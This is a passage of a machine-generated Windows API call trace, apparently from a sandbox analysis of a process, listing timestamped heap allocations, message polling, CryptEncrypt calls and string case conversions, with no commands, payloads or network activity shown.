returned 1 [0198.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0198.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.714] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x134a3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x134a8) returned 1 [0198.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0198.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0198.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0198.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0198.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0198.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0198.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0198.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0198.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0198.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0198.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0198.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0198.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0198.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0198.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0198.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0198.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0198.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0198.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0198.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0198.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0198.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0198.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0198.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0198.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0198.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.717] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.718] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.718] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.718] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0198.719] CharLowerBuffW (in: lpsz="byte[79016]", cchLength=0xb | out: lpsz="byte[79016]") returned 0xb [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0198.719] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0198.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0198.720] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0198.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0198.720] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.721] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0198.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0198.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.721] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.721] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.721] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0198.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0198.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.721] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.722] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34d5708*, pdwDataLen=0x8bef68*=0x134a3, dwBufLen=0x134a8 | out: pbData=0x34d5708*, pdwDataLen=0x8bef68*=0x134a8) returned 1 [0198.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0198.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0198.723] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01e0 [0198.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0190 [0198.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01d0 [0198.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0198.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0198.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0170 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.724] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.724] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01e0 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0190 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.724] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0198.724] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.724] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0198.724] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0198.725] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0198.725] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0198.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0198.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.725] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0198.725] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.725] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0198.725] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0198.725] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0198.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.725] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0198.726] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.726] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0198.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.726] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.726] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0198.726] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.726] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0198.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0198.726] RtlAllocateHeap 